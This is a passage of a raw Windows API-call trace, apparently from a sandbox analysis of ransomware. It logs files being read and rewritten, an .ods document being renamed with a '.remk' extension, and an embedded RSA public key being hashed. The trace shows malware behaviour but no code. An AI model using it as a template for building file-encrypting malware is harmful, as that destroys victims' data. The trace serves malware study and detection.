[0235.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0235.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc588 | out: hHeap=0x630000) returned 1 [0235.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.865] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0235.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5b8 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc570 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc558 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d148 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.867] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x148cb, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x148cb, lpOverlapped=0x0) returned 1 [0235.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0235.868] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x148d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.868] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.869] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.869] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.869] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.869] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.869] CloseHandle (hObject=0x640) returned 1 [0235.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0235.875] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.875] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\6jPQDPh.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\6jpqdph.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\6jPQDPh.ods.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\6jpqdph.ods.remk")) returned 1 [0235.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.876] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.876] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.878] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa58c80, ftCreationTime.dwHighDateTime=0x1d5da3c, ftLastAccessTime.dwLowDateTime=0x6d473cb0, ftLastAccessTime.dwHighDateTime=0x1d5d994, ftLastWriteTime.dwLowDateTime=0x6d473cb0, ftLastWriteTime.dwHighDateTime=0x1d5d994, nFileSizeHigh=0x0, nFileSizeLow=0x122b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d8nRRAoPzta8W1z.ods", cAlternateFileName="D8NRRA~1.ODS")) returned 1 [0235.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0235.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0235.878] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0235.878] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\d8nRRAoPzta8W1z.ods") returned=".ods" [0235.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\OSDzZr1qU8Y-\\d8nRRAoPzta8W1z.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\osdzzr1qu8y-\\d8nrraopzta8w1z.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.879] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=74422) returned 1 [0235.879] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.881] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x12290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.881] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.883] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.883] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.883] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.883] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x122b6, lpOverlapped=0x0) returned 1 [0235.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.885] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.885] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0235.886] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.886] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.886] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.886] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.886] GetLastError () returned 0x0 [0235.886] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.886] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0235.886] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.886] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.887] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.887] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x122c0) returned 0x37c6278 [0235.887] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d148 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc558 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d190 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc570 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5a0 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc600 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5b8 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.888] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5b8 | out: hHeap=0x630000) returned 1 [0235.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0235.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc600 [0235.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc5b8 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc5a0 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6d60 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5b8 | out: hHeap=0x630000) returned 1 [0235.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc600 | out: hHeap=0x630000) returned 1 [0235.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0235.890] GetCurrentThreadId () returned 0x314 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5010 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.890] GetCurrentThreadId () returned 0x314 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc600 [0235.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5a0 [0235.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5b8 [0235.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc588 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc618 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5e8 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5d0 [0235.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.892] 